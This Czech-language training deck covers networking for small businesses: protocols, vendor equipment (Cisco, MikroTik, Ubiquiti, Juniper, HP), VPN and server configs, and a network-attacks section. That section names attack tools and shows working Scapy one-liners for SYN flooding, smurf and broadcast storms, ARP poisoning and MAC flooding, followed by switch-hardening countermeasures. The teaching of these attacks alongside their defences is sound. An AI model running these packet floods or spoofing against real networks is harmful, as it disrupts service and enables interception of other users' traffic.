Upload
vladimir-smitka
View
307
Download
5
Embed Size (px)
DESCRIPTION
Prezentace z praktických školení rozšíření síťových dovedností pro SMB segment - verze roku 2014. Účastníci si mohou stáhnout doplňkové materiály na http://edu.lynt.cz.
Citation preview
http://lynt.cz14.04.2023 1
Sítě pro malé a střední podnikyrozšíření dovedností
Ing. Vladimír SmitkaLynt services s.r.o.
http://lynt.cz14.04.2023 2
Obsah
• Síťové modely a protokoly• Cisco aktivní prvky• Síťové prvky dalších výrobců• Základy konfigurace• Síťové útoky• Firewally a VPN• Síťové nástroje v Linuxu• Aplikace: Asterisk, Nginx
http://lynt.cz14.04.2023 3
Síťové modely
Aplikační
Prezentační
Relační
Transportní
Síťová
Linková
Fyzická
Aplikační
Transportní
Síťová
Fyzická
ISO/OSI model TCP/IP model
http://lynt.cz14.04.2023 4
Aplikační vrstva
• Spojení s transportní přes „socket“ (port)• DNS (53tu)/DHCP (67u/68u)• HTTP (80t)/HTTPS (443t)/SPDY (6121t)• TELNET(23t)/SSH(22t)• POP(110t)/IMAP(143)/SMTP(25t)/MAPI• FTP(20,21t)/TFTP(69u)
http://lynt.cz14.04.2023 5
DNS• A/AAAA (1/28)• NS (2)• CNAME (5)• MX (15)
• SOA• SRV• PTR• TXT• SPF• DNSKEY
• „GLUE“http://en.wikipedia.org/wiki/List_of_DNS_record_typeshttp://www.networksorcery.com/enp/protocol/dns.htmhttp://www.mailradar.com/spf/
Typy zpráv:Query / Response / Update
Question name: 63 znaků label, celkem 253 max0x04lynt0x03cz0x00
http://lynt.cz14.04.2023 6
DNS$ORIGIN example.com. ; designates the start of this zone file in the namespace$TTL 1h ; default expiration time of all resource records without their own TTL valueexample.com. IN SOA ns.example.com. username.example.com. ( 2007120710 ; serial number of this zone file 1d ; slave refresh (1 day) 2h ; slave retry time in case of a problem (2 hours) 4w ; slave expiration time (4 weeks) 1h ; maximum caching time in case of failed lookups (1 hour) )example.com. NS ns ; ns.example.com is a nameserver for example.comexample.com. NS ns.somewhere.example. ; ns.somewhere.example is a backup nameserver for example.comexample.com. MX 10 mail.example.com. ; mail.example.com is the mailserver for example.com@ MX 20 mail2.example.com. ; equivalent to above line, "@" represents zone originexample.com. A 192.0.2.1 ; IPv4 address for example.com AAAA 2001:db8:10::1 ; IPv6 address for example.comns A 192.0.2.2 ; IPv4 address for ns.example.com AAAA 2001:db8:10::2 ; IPv6 address for ns.example.comwww CNAME example.com. ; www.example.com is an alias for example.comwwwtest CNAME www ; wwwtest.example.com is another alias for www.example.commail A 192.0.2.3 ; IPv4 address for mail.example.com, ; any MX record host must be an address record ; as explained in RFC 2181 (section 10.3)mail2 A 192.0.2.4 ; IPv4 address for mail2.example.com
_sip._tcp.example.com. SRV 0 5 5060 example.com.
example.com. TXT "v=spf1 mx -all"
Zdroj: wikipedia.org
http://lynt.cz14.04.2023 8
DNS
DNS spoofing / DNS cache poisonnig- útočník odpoví rychleji než regulérní DNS server- musí znát ID a port
- „recursion no“ pro externí sítě- DNSSEC- autoritativní server
DNS amplification- malý dotaz vrátí velké množství dat- dig ANY xxx.yz @x.x.x.x
BIND, KNOT, Dnsmasq
Lokální DNS
ROOT DNS
ns.banka.czwww.banka.cz
útočník.czwww.banka.cz
Průzkum – dotaz na útočník.cz – zjištění QID a portuInicializace – dotaz na www.banka.cz – server neví, ptá se root serveru, ten ho odkáže na ns.banka.czPodvrh – dotaz k ns.banka.cz s novým QID, útočník posílá sadu odpovědí s pravděpodobným QID
http://lynt.cz14.04.2023 9
DHCP
• DHCP spoofing – rychlejší vyhrává• DHCP snooping
Klient Server
Discover (broadcast)
Offer
Request
ACK
Releaserenew
DeclineNAKInform
http://lynt.cz14.04.2023 11
Transportní vrstva (L4)
• Mapuje aplikace na porty• TCP/UDP
http://lynt.cz14.04.2023 13
TCP
• Segmentace a fragmentacePříznaky:URGACKPSHRSTSYNFIN
MSS – maximum segment size
http://lynt.cz14.04.2023 14
TCP handshake a další techniky
Zpoždění odpovědi:Před vyslání ACK se počká 200ms (Nagle‘s) a případná další data k přenosu jsou přibalena k odpovědi. V interaktivních aplikacích může způsobit latenci (TcpNoDelay).
Technika okna:Komunikující se domluví na počtu segmentů, po kterém je nutné poslat potvrzení. Dochází ke snížení režie, ale při chybách je nutné přeposlat celé okno (a sníží se i jeho délka).
CWND a SSTHRESH + pomalý start
http://lynt.cz14.04.2023 15
Síťová vrstva (L3)
• IP protokol – nespolehlivý, doručení musí potvrzovat vyšší vrstvy
• Protocol:– TCP (06)– UDP (17)– IPv4 (04), IPv6 (41)– ICMP (01)– GRE (47)
• Routování
http://lynt.cz14.04.2023 17
IPv4 adresa
192.168.001.001255.255.255.12811000000 10101000 00000001 00000001AND11111111 11111111 11111111 10000000
Network address/Broadcast address/Host address224.0.0.0 - 239.255.255.255 Multicast
http://vlsm-calc.net/
http://lynt.cz14.04.2023 18
Speciální adresy
• 10.0.0.0/8• 172.16.0.0/12• 192.168.0.0/16
• 127.0.0.0/8• 169.254.0.0/16• 224.0.0.0/4
• http://tools.ietf.org/html/rfc5735
http://lynt.cz14.04.2023 19
ICMP protokol
• ICMP redirect• Ping of Death• Smurf Attack• Ping flood
Type:0 – Echo reply3 – Cíl nedostupný5 – ICMP redirect8 – Echo request11 – TTL
http://www.faqs.org/rfcs/rfc792.html
http://lynt.cz14.04.2023 20
Linková vrstva (L2)
• 2 podvrstvy – Logical link control (LLC) a Media access control (MAC)
• LLC – vytváří rámce z L3 a indentifikuje jejich protokol
• MAC – adresuje rámce a posílá je do fyzické vrstvy (CSMA, HalfDuplex, FullDuplex)
• ARP, MAC protokoly (Ethernet – 802.3, Wifi 802.11), routovací protokoly (OSPF), PPP, L2TP, STP
• MAC adresa: 48 bitů (24 identifikace výrobce + 24 zařízení)
http://lynt.cz14.04.2023 21
ARP protokol
• Zjištění MAC adresy jiného stroje v subnetu• Pro IPv4 (v6 má NDP)
• Proxy ARP, RARP
• ARP spoofing
http://lynt.cz14.04.2023 22
Ethernetový rámec
IP 20
TCP 20
GRE 24 (4+20)
Ipsec 56
RTP 12
UDP 8
„Magická“ hodnota MSS = 1300ASA: sysopt connection tcpmss 1300 ISR: ip tcp adjust-mss 1300
ETH MTU CRC
ETH+CRC = 18VLAN=4
MTU: Maximum transfer unit
IP MTU = MTU – eth. hlavičkaMSS = IP MTU – IP a TCP hlavička
http://lynt.cz14.04.2023 23
Fyzická vrstva
• Kabely a konektory• Signály, kódování, rušení
http://lynt.cz14.04.2023 24
Síťové prvky
• HUB, Bridge• Switch• Router• Multi-layer switch• Speciální (firewally,…)
• Demo síť – ukázka funkcí a protokolů
http://lynt.cz14.04.2023 25
Produkty Cisco
• Small Business řada (SMB)• Enterprise & Service providers• Linksys (pro domácnost)
https://supportforums.cisco.com/community/netpro/small-business/onlinedemos
http://lynt.cz14.04.2023 26
SMB - switche
• Řada 100 – bez mgmt• Řada 200 – web mgmt, IPv6, 802.1x• Řada 300 – CLI, inter-vlan routing, ACL• Řada 500 – stack, 10GB (verze X)
Varianty s Fast Ethernet (F), Gigabit Ethernet (G), PoE (P/MP) – např. SG300-10MP
http://lynt.cz14.04.2023 27
SMB routery
Dual WAN(RV016 až 7 eth WAN)
Není verze s wi-fi50 (RV042) – 100 VPN tunelů
SSL VPN (5)a/b/g/n wi-fi
QuickVPN, ProtectLink
USB – 3G/4G (RV215W)NAT do 100Mbit
NAT do 800Mbit
http://lynt.cz14.04.2023 28
Cisco switche
• L2 switch 2960(S)– Řada S plně gigabitová, FlexStack (20Gbit)– LanLite [LanBase] – 64 VLAN [255], omezený QoS,
chybějící některé bezpečnostní prvky (DHCP snooping, ACL pouze na VLAN interface) a další funkce (DHCP server)
– Switche LanLite a LanBase jsou HW odlišné, nelze z LanLite upgradovat na LanBase
– Od verze 12.2(55) omezená podpora L3 routování (až 16 statických rout)
http://lynt.cz14.04.2023 29
Cisco switche• Přidávají podporu dynamického routování, HSRP, IP SLA, EEM• LanBase (L2), IP-Base (RIP, static), IP-Services (OSPF, EIGRP, BGP), Advanced
IP-Services (IPv6)• Plně nenahrazuje router - neumí NAT, NetFlow (3560-X a 3750-X Flexible
NetFlow), VPN, speciální ACL, pracuje pouze s Ethernetem• L3 switch 3560
– Verze v2 s nižší spotřebou– FastEthernet (verze G, E mají Gigabit, X navíc stack power)
• L3 switch 3750– StackWise (64Gbit), verze X má stack power– TrustSec (MacSec)
• L3 switch 3850 (novinka)– StackWise-480 (480Gbit)– Integrovaný wireless controller– IOS-XE (Linuxový základ, podpora více jader)
http://lynt.cz14.04.2023 30
Cisco switche pro datacentra
• Modulární L3 switche• Řada 4900• Řada 6500 (lze osadit supervizorem s podporou NAT)
http://lynt.cz14.04.2023 31
Kompaktní switche
• 2960-C a 3560-C• Magnetická podložka pro montáž• Napájení z PoE• Bez ventilátoru
http://lynt.cz14.04.2023 32
Cisco routery
• Integrated service router• 2. generace (1. = 1811, 2811,…)• Řada 800• Řada 1900• Řada 2900• Řada 3900
http://lynt.cz14.04.2023 33
Cisco 800• 860
– Switch 4 porty– Doporučeno 5 uživatelů– 2x VLAN
• 880– 2x PoE (externí napájení)– Doporučeno 20 uživatelů– 8x VLAN
• 890– Switch 8 portů– Doporučeno 50 uživatelů– 14x VLAN– Defaultně dodáván s Adv. IP Services
Advanced IP ServicesOSPF, EIGRP, BGPVRF lite802.1x WCCPIPSIPv6
http://lynt.cz14.04.2023 34
Cisco 1900, 2900, 3900
• Lze rozšiřovat moduly• Výkonnostní rozdíly• 1900 nelze použít pro UC• 3900 může využít HW akcelerátory
IP-BASEDynamické routovací protokolyDATAMPLS, RSVP, IP SLASECURITYSSL VPN, DMVPN, IPS, IpsecUCHlasové služby
http://lynt.cz14.04.2023 35
Výkon ISR G2
860 880 890 1921 1941 2901 2911 2921 2951 3925 3925E 3945 3945E
64B Kbps 25 50 100 290 330 330 352 479 579 833 1845 982 2924
1500B Mbps 197 198 1400 2770 2932 3114 3371 3502 5136 6903 6703 8025 8675
FW 30 43 54 530 569 625 676 801 1350 2567 6112 3133 7473
NAT 27 60 75 80 91 101 114 138 275 418 1067 496 1334
Ipsec 6 20 30 35 48 53 61 72 103 154 477 179 670
Kombinace 30 45 68 76 77 81 105 114 198 534 223 668
http://lynt.cz14.04.2023 37
Doplňkové služby ISR
• Cisco WAAS Express (na druhém konci musí být WAVE/WAE, nebo SRE modul)
• http://www.cisco.com/en/US/products/ps6474/index.html
http://lynt.cz14.04.2023 38
Security Appliances
• Firewall, VPN, IPS, základní síťové služby• Cisco Comprehensive Security Subscription
Services (antispam, antivir, antispyware, kontextový filtr…)
http://lynt.cz14.04.2023 39
Cisco ASA
• Základní konfigurace• ASDM• ASDM DEMO
• SSL VPN
conf tint g0nameif outsideip add dhcpno shut
copy tftp flashasdm image flash:/asdm-647.binhttp server enablehttp 0.0.0.0 0.0.0.0 outside
http://lynt.cz14.04.2023 40
Rozdíl oproti routeru
• V některých případech lze využít ASA jako gateway
• Odlišný výběr odchozího interface• Vybírá podle tabulky překladů (XLATE) místo
routovací tabulky• Omezené funkce DHCP, QoS a routování• Neumí GRE tunel
http://lynt.cz14.04.2023 41
Rozdíl oproti routeru
• ICMP inspection• same-security-interface• NoNAT• TCP State Bypass• Proxy-ARP
http://lynt.cz14.04.2023 42
Produkty Mikrotik
• RouterBoardy s RouterOS• Malé mgmt switche (novinka) s SwOS• RouterOS je licencovaný, lze koupit
samostatně pro různé platformy (např. x86)
• Skvělý poměr cena/funkcionalita
• Konfigurace přes CLI, web a aplikaci WinBox
http://lynt.cz14.04.2023 43
RouterOS licenceLevel number 0 (Demo mode) 1 (Free) 3 (WISP CPE) 4 (WISP) 5 (WISP) 6 (Controller)
Price no key registration required
volume only $45 $95 $250
Upgradable To - no upgrades ROS v6.x ROS v6.x ROS v7.x ROS v7.x
Initial Config Support
- - - 15 days 30 days 30 days
Wireless AP 24h trial - - yes yes yes
Wireless Client and Bridge
24h trial - yes yes yes yes
RIP, OSPF, BGP 24h trial - yesyes yes
yes
EoIP tunnels 24h trial 1 unlimited unlimited unlimited unlimitedPPPoE tunnels 24h trial 1 200 200 500 unlimitedPPTP tunnels 24h trial 1 200 200 500 unlimitedL2TP tunnels 24h trial 1 200 200 500 unlimitedOVPN tunnels 24h trial 1 200 200 unlimited unlimited
VLAN interfaces 24h trial 1 unlimited unlimited unlimited unlimited
HotSpot active users
24h trial 1 1 200 500 unlimited
RADIUS client 24h trial - yes yes yes yesQueues 24h trial 1 unlimited unlimited unlimited unlimitedWeb proxy 24h trial - yes yes yes yes
User manager active sessions
24h trial 1 10 20 50 Unlimited
Number of KVM guests
none 1 Unlimited Unlimited Unlimited Unlimited
http://lynt.cz14.04.2023 44
RouterBoardy
Klasické router desky s rozšiřujícími modulyRB9xx – novinka s miniPCIe
Routery Cloud Core
Integrované řešení
http://lynt.cz14.04.2023 45
Administrace
• Ukázka CLI• Ukázka webového mgmt• Ukázka WinBox
Nastavení rozhraní, VPN, Meta-Router
• The Dude
http://lynt.cz14.04.2023 46
QoS• IntServ (pevná rezervace pásma)• DiffServ (podle TOS, musí podporovat celá síť)• Speciální (Voice VLAN)
• Simple Queue (pouze adresy), Queue tree (nutno nejprve označkovat - mangle)
• limit-at, max-limit
• Bfifo, Pfifo (posílá data podle pořadí)• SFQ (přiděluje rovnoměrně pásmo sessionám)• RED (náhodné zahazování, tok nejde do špiček)• PCQ (dynamický qos, sloučení stejných queues, princip SFQ)
Omezení P2PHTBPriorita 1-8
http://lynt.cz14.04.2023 47
Cíle QoS
• Policing (na vstupu - tcp) a shaping (na výstupu – zpoždění, zahození)
• Vymezení pásma pro hlas a video• Priorita a minimální zpoždění pro hlas a video• Priorita malých packetů cca do 100B (řídící
zprávy)• Omezení P2P a jiných protokolů• Bránit zahlcení sítě
http://lynt.cz14.04.2023 49
Produkty Ubiquiti
• Cenově výhodné řešení vhodné pro menší podniky• UniFi - Wifi AP – AP ovládaná controllerem (Java aplikace)
• AirMAX – pro venkovní spoje (2.4/5 GHz)• AirFiber (24GHz, jen na jednotky km, přestože
výrobce slibuje i delší)• AirVision – kamerový systém• mFi – „automatizace“ např. mPower – ovládané
zásuvky, pohybové senzory…
http://lynt.cz14.04.2023 50
Ubiquiti Unifi
• Ukázka řešení wifi sítě s Ubiquiti UniFi
• UniFi controller (win, lin, mac)• L2/L3 (DNS záznam unifi)
• Captive portal s vouchery
mca-cliinfoset-inform http://ip:8080/inform
syswrapper.sh restore-default
http://lynt.cz14.04.2023 51
Produkty Juniper
• OS Junos běžící nad BSD• ScreenOS – pro FW/VPN• % Unix mód• > CLI mód• # konfigurační mód
http://lynt.cz14.04.2023 52
Juniper SRX a SSG
• SSG ScreenOS, SRX Junos• Firewall/gateway• Neumí SSL VPN
http://lynt.cz14.04.2023 53
Juniper switche a routery
• Switche EX• Virtual Chassis (StackWise)• EX2200 – přístupové switche (2960), RIP• EX3200, EX3300 – obdoba L3 switchů u Cisco
• Routery řady J – obdoba Cisco ISR
http://lynt.cz14.04.2023 54
Produkty HP
• Základní funkcionalita obdobná jako Cisco• Méně propracovaný QoS, odlišná práce s VLAN• Doživotní záruka, volnější přístup k updatům• GUI• SMB switche 18xx a 19xx (web mgmt)• L2, L3 (statické), L3 (RIP), L3 (Advanced)
• http://h17007.www1.hp.com/docs/interoperability/Cisco/HP-Networking-and-Cisco-CLI-Reference-Guide_June_10_WW_Eng_ltr.pdf
http://lynt.cz14.04.2023 55
Základy konfigurace Cisco• Password recovery Router:
– Break– confreg 0x2142– reset– ena– conf t– Nová konfigurace– config-reg 0x2102– exit– wr– reload
• Password recovery Switch: – mode tlačítko– flash_init– load_helper– dir flash:– delete flash:/config.text– delete flash:/vlan.dat– boot– ena– conf t– Nová konfigurace– do reload
http://lynt.cz14.04.2023 56
Základy konfigurace Cisco• show version – info o zařízení• enable – privilegovaný mód• show running-config – výpis konfigurace• configure terminal – konfigurační mód• copy running-config startup-config – uložení konfigu• write mem – rychlejší příkaz na uložení• show logging – zobrazení logu• show interface description – informace o rozhraních• show interface <jmeno> - info o konkrétním rozhraní• show ip interfaces brief – ip adresy na rozhraních• show cdp neighbors – info o sousedících zařízeních
http://lynt.cz14.04.2023 57
Pro zpříjemnění konfigurace
• no ip domain lookup – vypnutí zoušení připojení telnetem na doménové jméno při neznámém příkazu
• terminal monitor – výpis aktuálních událostí při konfiguraci přes vty
• logging synchronous (line con 0/line vty ..) – při přerušení psaní příkazu událostí v logu obnoví psaný příkaz
• TAB – doplnění příkazu• ? - nápověda• CTRL+SHIFT+6 – ukončení prováděného příkazu• CTRL+A – na začátek řádku• CTRL+E – na konec řádku
http://lynt.cz14.04.2023 58
Útoky• Kabelový útok
– bpdu guard, portfast• MAC flood
– macof, port security• TCP SYN flood• Broadcast storm
– Scapy, storm control, psp• VLAN hopping
– Yersinia, switchport mode acces, no negotiate• ARP cache poisonnig
– Cain, Scapy, arpspoof• DHCP spoofing
– DHCP snooping, Dynamic ARP inspection, Source guard
http://lynt.cz14.04.2023 59
Scapy>>> tcpSYN=IP(dst=„cil")/TCP(dport=80, flags="S")>>> send(tcpSYN, loop=1)
>>> smurf=IP(src=„cil", dst="192.168.1.255")/ICMP()>>> send(smurf, loop=1)
>>> storm=IP(src="192.168.1.255", dst="192.168.1.255")/ICMP()>>> send(storm, loop=1)
>>> ether=Ether(dst="00:00:00:00:00:0a")>>> arp=ARP(op="is-at", hwsrc="00:00:00:00:00:0d", psrc="192.168.1.2", pdst="192.168.1.1")>>> ARPPoison=ether/arp>>> sendp(ARPPoison, loop=1, inter=5)
>>> while True:>>> macof=Ether(dst="aa:bb:aa:bb:aa:bb", src=RandMAC())>>> sendp(macof)
http://lynt.cz14.04.2023 60
Zabezpečení portuinterface Fa0/1 switchport port-security ! zapnutí bezpečnosti switchport port-security maximum 3 ! 3 MAC adresy pro PC switchport port-security violation restrict ! zahazuje pakety switchport port-security aging time 2 ! 2 minuty pro vypršení adresy switchport port-security aging type inactivity ! pouze pokud je port neaktivní switchport port-security maximum 1 vlan voice ! 1 MAC adresa pro IP telefon switchport access vlan 10 ! konfigurace podsite pro PC switchport voice vlan 20 ! konfigurace podsite pro IPT ip verify source port-security ip verify source switchport mode access switchport nonegotiate spanning-tree portfast no cdp enable storm-control broadcast level 20
spanning-tree portfast bpduguard defaultip dhcp snoopingip dhcp snooping vlan 10no ip dhcp snooping information optionip arp inspection vlan 10ip arp inspection validate src-mac dst-mac ip
int Gi0/4 ! na trunk portech nastavit trust a počet DHCP dotazů ip dhcp snooping trust ip dhcp snooping limit rate 100 ! default je neomezeno ip arp inspection trust ip arp inspection limit rate 100 ! default je 15 paketů/sec
http://lynt.cz14.04.2023 61
Wifi bezpečnost
• WEP• WPA personal• WPA enterprise• WPS – reaver, wash
• wifite
http://lynt.cz14.04.2023 62
Firewally
• FW builder - http://www.fwbuilder.org• iptables -A INPUT -p tcp -s x.x.x.x --dport 80 -j
DROP• access-list 101 deny tcp host x.x.x.x any eq
www(config-if) ip access-group 101 in
• access-list ACL_OUT extended deny tcp host x.x.x.x any eq wwwaccess-group ACL_OUT in interface outside
http://lynt.cz14.04.2023 64
PPTP• Balíček pptpd• /etc/pptpd.conf#nastaveni parametru pripojenioption /etc/ppp/pptpd-options#lokalni adresa/adresy pridelovane klientumlocalip 192.168.119.1#adresy klienturemoteip 192.168.119.2-254
• /etc/ppp/pptpd-optionsname pptpd#vyzadovat MSCHAPv2 s sifrovanimrefuse-paprefuse-chaprefuse-mschaprequire-mschap-v2require-mppe-128proxyarplock#vypnuti nekompatibilnich kompresinobsdcompnovjnovjccompnologfdms-dns 8.8.8.8
• Konfigurace uživatelů v /etc/ppp/chap-secrets<user> pptpd <pass> *
Cisco:aaa authentication ppp <group-name> localvpdn enablevpdn-group <group-name> accept-dialin protocol pptp virtual-template 1
interface Virtual-Template1 ip address 192.168.103.209 255.255.255.240 peer default ip address pool <pool-name> ppp encrypt mppe auto required ppp authentication ms-chap-v2 <group-name> ppp multilink
ip local pool <pool-name> 192.168.103.211 192.168.103.221
http://lynt.cz14.04.2023 65
L2TP - Linux• Pouze tunelovací protokol, pro šifrování se nejčastěji využívá ipsec
Tunelovací daemon xl2tpd/etc/xl2tpd/xl2tpd.conf
[global]auth file = /etc/ppp/chap-secrets; listen-addr = 192.168.1.98[lns default]ip range = 192.168.1.128-192.168.1.254local ip = 192.168.1.1require chap = yesrefuse pap = yesrequire authentication = yesname = LinuxVPNserverppp debug = yespppoptfile = /etc/ppp/options.xl2tpdlength bit = yes
Chap-secrets podobně jako u PPTP
Ipsec – openswan nebo ipsec-toolsOpenSwan + PSK:
/etc/ipsec.confversion 2.0 config setup protostack=netkey nat_traversal=yes oe=off
conn vpnserver type=transport ;tunnel mod neni podporovan windows authby=secret pfs=no rekey=no keyingtries=1 left=%defaultroute leftprotoport=udp/l2tp leftid=@<hostname/ip serveru> right=%any rightprotoport=udp/%any auto=add
PSK v /etc/ipsec.d/ipsec.secrets%any %any : PSK "velmi tajny klic"
http://lynt.cz14.04.2023 66
L2TP - ASAusername <jmeno> password <heslo> mschap
ip local pool l2tp-pool 192.168.1.2-192.168.1.254 mask 255.255.255.0
crypto isakmp policy 10 authentication pre-share encryption 3des hash sha group 2 lifetime 86400 crypto isakmp enable outside
crypto ipsec transform-set vpn-ts esp-3des esp-sha-hmaccrypto ipsec transform-set vpn-ts mode transport //zapnutí transport módu pro windows
crypto dynamic-map vpn-map 10 set transform-set vpn-ts //definování šablony přijímající spojení založené na vpn-tscrypto map mymap 65535 ipsec-isakmp dynamic vpn-map //přilepení šablony vpn-map na IKE vyjednávánícrypto map mymap interface outside //zapnutí mymap, která přijímá IKE připojení
same-security-traffic permit intra-interface //povolení komunikace mezi vpn klienty
tunnel-group DefaultRAGroup type ipsec-ratunnel-group DefaultRAGroup general-attributes address-pool l2tp-pool authentication-server-group LOCAL //ověřování uživatelů z lokální databázitunnel-group DefaultRAGroup ipsec-attributes pre-shared-key <psk klic> tunnel-group DefaultRAGroup ppp-attributes no authentication chap authentication ms-chap-v1 authentication ms-chap-v2
isakmp nat-traversal
http://lynt.cz14.04.2023 67
L2TP - Mikrotik/ interface l2tp-server server set enabled=yes
/ ppp secret add name=12345 password=12345 profile=default-encryption \ local-address=192.168.1.1 remote-address=192.168.1.2
/ip ipsec peer add address=192.168.1.1 auth-method=pre-shared-key exchange-mode=main-l2tp\ secret=123456789 hash-algorithm=sha1 enc-algorithm=3des generate-policy=yes
http://lynt.cz14.04.2023 68
OpenVPN• Podporuje split-tunnel• Používá jen 1 port tcp/udp• Podporováno i na Mikrotiku (neumí LZO a UDP, TLS autentifikaci)
port 4001proto tcp-serverdev tap1
ca /etc/openvpn/keys/ca.crtcert /etc/openvpn/xy/server.crtkey /etc/openvpn/xy/server.keydh /etc/openvpn/keys/dh1024.pem
mode server
ifconfig-pool-persist xy.txtifconfig-pool 192.168.21.2 192.168.201.10 255.255.255.0
keepalive 10 120comp-lzo
ifconfig 192.168.21.1 255.255.255.0
persist-keypersist-tun
port 4001proto tcp-client
dev tap
remote platypus.lynt.cz
ca /etc/openvpn/keys/ca.crtcert /etc/openvpn/keys/xy.crtkey /etc/openvpn/keys/xy.keydh /etc/openvpn/keys/dh1024.pem
pull
tls-clientns-cert-type server
keepalive 10 120comp-lzo
persist-keypersist-tun
http://lynt.cz14.04.2023 69
Síťové nástroje v Linuxu• ip• tcpdump• iptables• tc• nmap• iptraf/iftop• mtr/tracepath• iperf• findsmb• netstat• mii-tool/ethtool• dig/whois• netcat
http://lynt.cz14.04.2023 70
TC – traffic control• Zobrazení aktuálních front• tc -s -d qdisc show dev eth0
• Nastavení TBF - average• tc qdisc add dev eth0 root tbf rate 0.5mbit burst 6kb latency 70ms
• Smazání qdisc:• tc qdisc del dev eth0 root
• http://wiki.hkfree.org/QoS• http://sourceforge.net/projects/htbinit/• http://sourceforge.net/projects/cbqinit/
http://lynt.cz14.04.2023 71
PBX Asterisk
• Aktuální verze 11• Vhodné zkompilovat podle potřeb
(menuconfig)• Pro základní funkcionalitu 4 soubory:– asterisk.conf (jen cesty)– modules.conf (automatické načítání modulů)– sip.conf (registrace sip telefonů a trunků)– extensions.conf (dialplán)
http://lynt.cz14.04.2023 72
SIP.conf[general]allowguest=noregister => ucet:[email protected]
[100]allow=alltype=friendsecret=100100host=dynamiccallerid= Karel <100>context=internal
[101]allow=alltype=friendsecret=101101host=dynamiccallerid= Petr <101>context=internal
[trunk]type=peerhost=sip.poskytovatel.czcanrenvite=nocontext=incoming
http://lynt.cz14.04.2023 73
EXTENSIONS.conf[internal]exten => 100,1,Dial(SIP/100)exten => 101,1,Dial(SIP/101)
exten => 99,1,Answer()exten => 99,n,MP3Player(/etc/asterisk/test.mp3)exten => 99,n,Echo()exten => 99,n,Wait(1)exten => 99,n,Hangup()
exten =>_XXXXXXXXX,1,Dial(SIP/420${EXTEN}@trunk)
[incoming]exten =>420123456100,1,Dial(SIP/100)exten =>420123456101,1,Dial(SIP/101)
http://lynt.cz14.04.2023 74
Telefony Cisco 79xx
• DHCP option 66 (tftp server)(příp. 150 – CCM – list tftp serverů)
• Na TFP:– Firmware: *.sbn, *.loads– dialplan.xml– Konfigurace SEP<mac>.cnf.xml
• Rozdíly fw verze 8 a 9
http://lynt.cz14.04.2023 75
Softwarové telefony
• X-Lite• Zoiper (2 linky, podpora IAX)• 3CX Phone (mnoho linek)
• Blink (opensource)
• SIP droid• cSIPsimple• Zoiper
http://lynt.cz14.04.2023 76
Webový server NGINX
upstream vnitrni-server { server 192.168.1.100:80;}server { listen 80; server_name nejaky.web.cz; location / { proxy_pass http://vnitrni-server; proxy_redirect off; proxy_buffering off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; }}
• Vhodný pro zpracování statických souborů• V kombinaci s php-fpm může nahradit Apache (nepodporuje .htaccess)• Reverzní proxy